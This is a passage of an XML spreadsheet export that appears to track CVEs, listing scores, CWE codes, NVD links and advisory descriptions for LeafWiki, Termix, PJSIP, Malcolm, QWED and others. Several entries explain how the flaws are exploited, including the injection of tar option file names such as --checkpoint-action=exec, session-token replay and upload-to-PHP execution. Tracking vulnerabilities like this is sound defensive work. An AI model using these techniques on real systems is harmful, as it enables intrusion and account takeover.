vfio/pci: Clean up DMABUFs before disabling function
On device shutdown, make vfio_pci_core_close_device() call
vfio_pci_dma_buf_cleanup() before the function is disabled via
vfio_pci_core_disable().  This ensures that all access via DMABUFs is
revoked before the function's BARs become inaccessible.
This fixes an issue where, if the function is disabled first, a tiny
window exists in which the function's MSE is cleared and yet BARs
could still be accessed via the DMABUF.  The resources would also be
freed and up for grabs by a different driver.</t>
        </is>
      </c>
      <c r="M799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53322</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53527</t>
        </is>
      </c>
      <c r="C800" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D800" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E800" s="5" t="inlineStr"/>
      <c r="F800" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G800" s="5" t="inlineStr"/>
      <c r="H800" s="5" t="inlineStr"/>
      <c r="I800" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J800" s="5" t="inlineStr"/>
      <c r="K800" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L800" s="5" t="inlineStr">
        <is>
          <t>LeafWiki is a self-hosted wiki. Versions 0.1.0 through 0.10.0 have a privilege escalation vulnerability in the user update API. An authenticated user could update their own account role and escalate privileges from a regular user, such as `viewer`, to `admin`. Exploitation requires a valid authenticated LeafWiki user account. Instances without public registration and with only trusted users are at lower practical risk. Users should update to version 0.10.1 or greater. Until a patch is available, operators should restrict account creation and ensure that only trusted users have accounts on affected LeafWiki instances. If possible, access to the user update API should be restricted to trusted users or administrators only.</t>
        </is>
      </c>
      <c r="M800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53527</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53528</t>
        </is>
      </c>
      <c r="C801" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D801" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E801" s="5" t="inlineStr"/>
      <c r="F801" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G801" s="5" t="inlineStr"/>
      <c r="H801" s="5" t="inlineStr"/>
      <c r="I801" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J801" s="5" t="inlineStr"/>
      <c r="K801" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L801" s="5" t="inlineStr">
        <is>
          <t>LeafWiki is a self-hosted wiki. Versions 0.3.0 through 0.10.0 have a path traversal vulnerability in LeafWiki’s asset rename functionality. An authenticated user with editor permissions could move files that are accessible to the LeafWiki server process into a page’s asset directory. This could allow sensitive local files, such as the application database, to become downloadable as page assets. Users should update to version 0.10.1 or greater. As an additional mitigation, operators should ensure that the LeafWiki process runs with the least privileges necessary and does not have filesystem access to sensitive files outside the application’s required directories. Until a patch is applied, operators may reduce risk by restricting editor access to trusted users only and by limiting the filesystem permissions of the LeafWiki process.</t>
        </is>
      </c>
      <c r="M801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53528</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53542</t>
        </is>
      </c>
      <c r="C802" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D802" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E802" s="5" t="inlineStr"/>
      <c r="F802" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G802" s="5" t="inlineStr"/>
      <c r="H802" s="5" t="inlineStr"/>
      <c r="I802" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J802" s="5" t="inlineStr"/>
      <c r="K802" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L802" s="5" t="inlineStr">
        <is>
          <t>Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to 2.3.2, the archive creation endpoint in src/backend/ssh/file-manager.ts passes selected file basenames to tar without an end-of-options marker and without making the operands unambiguously relative. A user with access to an SSH file-manager session can select basenames beginning with GNU tar options such as --checkpoint=1 and --checkpoint-action=exec, causing tar, tar.gz, tar.bz2, or tar.xz creation to interpret those names as options. The resulting checkpoint action executes commands on the managed SSH host with the privileges of the connected SSH account, allowing file disclosure, modification, and service disruption. This issue is fixed in version 2.3.2.</t>
        </is>
      </c>
      <c r="M802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53542</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53547</t>
        </is>
      </c>
      <c r="C803" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D803" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E803" s="5" t="inlineStr"/>
      <c r="F803" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G803" s="5" t="inlineStr"/>
      <c r="H803" s="5" t="inlineStr"/>
      <c r="I803" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J803" s="5" t="inlineStr"/>
      <c r="K803" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L803" s="5" t="inlineStr">
        <is>
          <t>Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to 2.3.2, the POST /database/export endpoint creates a user export that includes the global settings table even though the rest of the export is user-scoped. The settings table contains reset_code_ and temp_reset_token_ password-reset artifacts, allowing a low-privileged authenticated user to recover another local account's reset code and complete the normal password-reset flow. Successful exploitation results in local-user account takeover and administrative compromise when the victim is an administrator. This issue is fixed in version 2.3.2.</t>
        </is>
      </c>
      <c r="M803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53547</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53706</t>
        </is>
      </c>
      <c r="C804" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D804" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E804" s="5" t="inlineStr"/>
      <c r="F804" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G804" s="5" t="inlineStr"/>
      <c r="H804" s="5" t="inlineStr"/>
      <c r="I804" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J804" s="5" t="inlineStr"/>
      <c r="K804" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="L804" s="5" t="inlineStr">
        <is>
          <t>PREVAIL is a Polynomial-Runtime EBPF Verifier using an Abstract Interpretation Layer. Prior to version 0.2.4, the prevail eBPF verifier accepts ALU32 ADD and SUB instructions that operate on pointer-typed registers without checking the is64 flag. Because ALU32 arithmetic zero-extends the 32-bit result, the upper half of any pointer is silently destroyed at runtime, yet prevail marks the program as verified safe. Any caller that can submit an eBPF program for verification — including unprivileged users on kernels that permit BPF program loading — can produce a program that passes verification but faults or misbehaves at runtime. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="M804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53706</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54099</t>
        </is>
      </c>
      <c r="C805" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D805" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E805" s="5" t="inlineStr"/>
      <c r="F805" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G805" s="5" t="inlineStr">
        <is>
          <t>windows, red hat</t>
        </is>
      </c>
      <c r="H805" s="5" t="inlineStr">
        <is>
          <t>redhat:openshift_container_platform, redhat:windows_machine_config_operator</t>
        </is>
      </c>
      <c r="I805" s="5" t="inlineStr">
        <is>
          <t>2026-06-22</t>
        </is>
      </c>
      <c r="J805" s="5" t="inlineStr"/>
      <c r="K805" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L805" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Windows Machine Config Operator (WMCO) for Red Hat OpenShift Container Platform. The WICD CSR auto-approver validates that a Certificate Signing Request contains the organization system:wicd-nodes but does not reject additional organization values such as system:masters. A compromised Windows worker node that holds WICD credentials can submit a CSR that is auto-approved and signed by the cluster, yielding a client certificate that grants cluster-administrator privileges and enabling full cluster takeover.</t>
        </is>
      </c>
      <c r="M805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54099</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54721</t>
        </is>
      </c>
      <c r="C806" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D806" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E806" s="5" t="inlineStr"/>
      <c r="F806" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G806" s="5" t="inlineStr"/>
      <c r="H806" s="5" t="inlineStr"/>
      <c r="I806" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J806" s="5" t="inlineStr"/>
      <c r="K806" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L806" s="5" t="inlineStr">
        <is>
          <t>Silverstripe UserForms provides a visual form builder for the Silverstripe CMS. From 6.0.0 until 6.4.9, 7.0.7, and 7.1.1, the userform email recipient subject field in the CMS accepts a specially crafted payload that can be interpreted as executable server-side code. An authenticated CMS user with permission to configure a UserForms email recipient can use the subject field to run arbitrary code on the server, compromising confidentiality, integrity, and availability. This issue is fixed in versions 6.4.9, 7.0.7, and 7.1.1.</t>
        </is>
      </c>
      <c r="M806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54721</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55485</t>
        </is>
      </c>
      <c r="C807" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D807" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E807" s="5" t="inlineStr"/>
      <c r="F807" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G807" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H807" s="5" t="inlineStr"/>
      <c r="I807" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J807" s="5" t="inlineStr"/>
      <c r="K807" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="L807" s="5" t="inlineStr">
        <is>
          <t>Piccolo Admin is an admin interface and content management system for Python, built on top of Piccolo. Prior to 1.14.0, piccolo_admin/endpoints.py uses superuser_validators to block PUT, PATCH, DELETE, and POST requests by non-superusers but permits GET requests to configured user and session tables, while piccolo_api/session_auth/tables.py exposes SessionsBase.token because the token column is not secret. In deployments that add the Sessions and User tables to create_admin, a non-superuser administrator can call GET /api/tables/sessions/, obtain another user's live session token, replay it as the Cookie id value to impersonate a superuser, and permanently set superuser to true on the attacker's own row. This issue is fixed in version 1.14.0.</t>
        </is>
      </c>
      <c r="M807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55485</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55509</t>
        </is>
      </c>
      <c r="C808" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D808" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E808" s="5" t="inlineStr"/>
      <c r="F808" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G808" s="5" t="inlineStr">
        <is>
          <t>oracle, mysql</t>
        </is>
      </c>
      <c r="H808" s="5" t="inlineStr"/>
      <c r="I808" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J808" s="5" t="inlineStr"/>
      <c r="K808" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L808" s="5" t="inlineStr">
        <is>
          <t>WsgiDAV is a generic and extendable WebDAV server based on WSGI. Prior to 4.3.5, the sample MySQLBrowserProvider in wsgidav/samples/mysql_dav_provider.py concatenates the record key parsed from a request URL directly into SQL WHERE clauses. The affected _exists_record_by_primary_key, _get_field_by_primary_key, and _get_record_by_primary_key methods are part of a shipped example provider that is not enabled by default. An attacker who can access a share explicitly configured with this non-default provider can inject SQL through a normal GET request; anonymously exposed read shares permit a status-code oracle and extraction of arbitrary data reachable by the configured MySQL account. This issue is fixed in version 4.3.5.</t>
        </is>
      </c>
      <c r="M808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55509</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55521</t>
        </is>
      </c>
      <c r="C809" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D809" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E809" s="5" t="inlineStr"/>
      <c r="F809" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G809" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H809" s="5" t="inlineStr"/>
      <c r="I809" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J809" s="5" t="inlineStr"/>
      <c r="K809" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L809" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs omits authorization checks in IndexesApi.listPacketIndex, IndexesApi.listEventIndex, Cop1Api.disable, Cop1Api.resume, Cop1Api.initialize, Cop1Api.updateConfig, and TimeApi.setTime. An authenticated low-privilege user can read packet and event index metadata without ObjectPrivilegeType.ReadPacket, alter COP-1 link state without SystemPrivilege.ControlLinks, and manipulate simulation time. These operations can disclose telemetry metadata, disrupt telecommand handling, and affect system integrity and availability. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55521</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55541</t>
        </is>
      </c>
      <c r="C810" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D810" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E810" s="5" t="inlineStr"/>
      <c r="F810" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G810" s="5" t="inlineStr"/>
      <c r="H810" s="5" t="inlineStr"/>
      <c r="I810" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J810" s="5" t="inlineStr"/>
      <c r="K810" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L810" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, praisonai serve agents and praisonai serve unified parse --api-key but _create_agents_app() and _create_unified_app() do not install a credential check. Unauthenticated callers can reach POST /agents and POST /api/v1/agents/{id}/invoke. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55541</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55585</t>
        </is>
      </c>
      <c r="C811" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D811" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E811" s="5" t="inlineStr"/>
      <c r="F811" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G811" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H811" s="5" t="inlineStr"/>
      <c r="I811" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J811" s="5" t="inlineStr"/>
      <c r="K811" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L811" s="5" t="inlineStr">
        <is>
          <t>QWED is open-source AI verification infrastructure for deterministic verification of LLM outputs, tool calls, code, schemas, and agent state before production execution. Prior to 5.1.2, the qwed package passes caller-controlled math expressions directly to SymPy parse_expr() without restricted global_dict and local_dict namespaces, allowing Python eval() to resolve builtins and execute arbitrary Python code in the API server process. In src/qwed_new/api/main.py, POST /verify/math is protected by get_current_tenant but accepts any valid tenant API key, reads the expression field, applies only a cosmetic re.sub(r'(\d)(()', r'\1*\2', expression) normalization, and passes the result to parse_expr(). In src/qwed_new/core/batch.py, POST /verify/batch sends math items through batch_service.create_job(), stores item.query verbatim, and _verify_item() passes VerificationType.MATH input to parse_expr() without sanitization. The default-enabled POST /auth/signup endpoint allows anyone to create a standard tenant account, POST /auth/api-keys issues an x-api-key, and either vulnerable path can then be used to read or write files, modify data, execute operating system commands, terminate the service, and compromise other tenants in a shared deployment. This issue is fixed in version 5.1.2.</t>
        </is>
      </c>
      <c r="M811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55585</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55637</t>
        </is>
      </c>
      <c r="C812" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D812" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E812" s="5" t="inlineStr"/>
      <c r="F812" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G812" s="5" t="inlineStr"/>
      <c r="H812" s="5" t="inlineStr"/>
      <c r="I812" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J812" s="5" t="inlineStr"/>
      <c r="K812" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L812" s="5" t="inlineStr">
        <is>
          <t>genieacs-mcp is an MCP server for GenieACS written in Go. Prior to 0.3.2, the Streamable HTTP transport in cmd/server/main.go creates an unauthenticated /mcp listener on the default MCP_LISTEN_ADDR value 127.0.0.1:8080 when MCP_AUTH_TOKEN is unset and the httpSrv.Start(addr) branch does not validate the Host or Origin headers. A malicious website can use DNS rebinding to send browser requests with attacker-controlled Host and Origin values to the loopback listener, initialize an MCP session, list tools, and invoke operations against the GenieACS NBI configured by ACS_URL. Successful exploitation can expose or modify CPE management state, including device reboots, firmware tasks, TR-069 parameter changes, presets, provisions, tags, connection requests, and task operations. The npm wrapper is not affected because it forces TRANSPORT=stdio and does not expose an HTTP listener. This issue is fixed in version 0.3.2.</t>
        </is>
      </c>
      <c r="M812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55637</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55676</t>
        </is>
      </c>
      <c r="C813" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D813" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E813" s="5" t="inlineStr"/>
      <c r="F813" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G813" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H813" s="5" t="inlineStr"/>
      <c r="I813" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J813" s="5" t="inlineStr"/>
      <c r="K813" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L813" s="5" t="inlineStr">
        <is>
          <t>Malcolm is a network traffic analysis tool suite. The file-upload component (FilePond PHP backend) accepts uploads at `POST /server/php/submit.php` and stores them in a directory served by the same nginx and php-fpm instance. The allow-list that should restrict accepted file types is an empty array by default (`file-upload/php/config.php:16`), so the type check is a no-op and every extension is accepted. The filename sanitizer keeps the `.php` extension intact. Committed files land in `/var/www/upload/server/php/files` (`file-upload/php/config.php:7`), and the component's nginx routes any URL ending in `.php` to php-fpm. An authenticated `GET /server/php/files/&lt;name&gt;.php` then executes the uploaded code as `www-data`. Prior to version 26.06.1, in RBAC mode, the upload endpoint is reachable by the granular `ROLE_UPLOAD` role (`nginx/lua/nginx_auth_helpers.lua:71`), a role intended only for submitting capture files. As a result, a user holding the upload-only role runs arbitrary PHP as `www-data` inside the file-upload container. Version 26.06.1 fixes the issue.</t>
        </is>
      </c>
      <c r="M813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55676</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57161</t>
        </is>
      </c>
      <c r="C814" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D814" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E814" s="5" t="inlineStr"/>
      <c r="F814" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G814" s="5" t="inlineStr"/>
      <c r="H814" s="5" t="inlineStr"/>
      <c r="I814" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J814" s="5" t="inlineStr"/>
      <c r="K814" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L814" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit acc03b5, a stack buffer overflow exists in PJSUA when processing Service-Route headers in a registration response (update_service_route() in pjsua_acc.c). This affects applications that register using the PJSUA/PJSUA2 account API (the default registration path). The Service-Route URIs from a 2xx response to REGISTER are stored into a fixed-size array without bounding the number of headers; a registrar that returns an excessive number of Service-Route headers can write past the end of the array on the stack. The values written are internal pointers rather than arbitrary data, so the most likely impact is unexpected application termination (denial of service), though memory corruption cannot be excluded. The malicious response may come from a compromised or malicious registrar, or — over unprotected transports — a spoofed response. This issue has been patched via commit acc03b5.</t>
        </is>
      </c>
      <c r="M814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57161</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57162</t>
        </is>
      </c>
      <c r="C815" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D815" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E815" s="5" t="inlineStr"/>
      <c r="F815" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G815" s="5" t="inlineStr"/>
      <c r="H815" s="5" t="inlineStr"/>
      <c r="I815" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J815" s="5" t="inlineStr"/>
      <c r="K815" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L815" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit a1b707c, a stack buffer overflow exists in the SRTP/SDES media transport when processing a=crypto attributes during SDP offer/answer (sdes_encode_sdp() in transport_srtp_sdes.c). This affects applications with SRTP enabled (use_srtp optional or mandatory, using SDES keying). During media negotiation, the crypto attributes from the remote SDP are collected into a fixed-size array without bounding their number; a remote peer that includes an excessive number of a=crypto attributes in a single media description can write past the end of that array on the stack. This is reachable from an incoming SIP INVITE during offer/answer, before application-level authentication. Impact may range from unexpected application termination to control flow hijack/memory corruption. Applications that do not enable SRTP are not affected. This issue has been patched via commit a1b707c.</t>
        </is>
      </c>
      <c r="M815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57162</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57163</t>
        </is>
      </c>
      <c r="C816" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D816" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E816" s="5" t="inlineStr"/>
      <c r="F816" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G816" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H816" s="5" t="inlineStr"/>
      <c r="I816" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J816" s="5" t="inlineStr"/>
      <c r="K816" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L816" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit c4a151a, a stack buffer overflow exists in the GnuTLS TLS backend when parsing the Subject Alternative Name extension of a peer certificate (tls_cert_get_info() in ssl_sock_gtls.c). Only GnuTLS builds are affected (--with-gnutls); OpenSSL and Apple SecureTransport/Network.framework builds are not affected. While extracting certificate information after a TLS handshake, an incorrect buffer-size value can cause an oversized SubjectAltName entry to be written past the end of a fixed-size stack buffer. A network-positioned attacker presenting a crafted certificate — a malicious server to a connecting client, or a malicious client to a server that requests certificates — can trigger this during the TLS handshake, before any SIP-level authentication. Impact may range from unexpected application termination to control flow hijack/memory corruption. This issue has been patched via commit c4a151a.</t>
        </is>
      </c>
      <c r="M816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57163</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57866</t>
        </is>
      </c>
      <c r="C817" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D817" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E817" s="5" t="inlineStr"/>
      <c r="F817" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G817" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H817" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="I817" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J817" s="5" t="inlineStr"/>
      <c r="K817" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L817" s="5" t="inlineStr">
        <is>
          <t>Server side request forgery in Apache Impala versions 4.4.x and 4.5.x.  Authenticated Impala users with permissions to execute the ai_generate_text() function can exfiltrate secrets provided by the credential providers configured in the `hadoop.security.credential.provider.path` property of `core-site.xml`. The secret's key must be known to the user.</t>
        </is>
      </c>
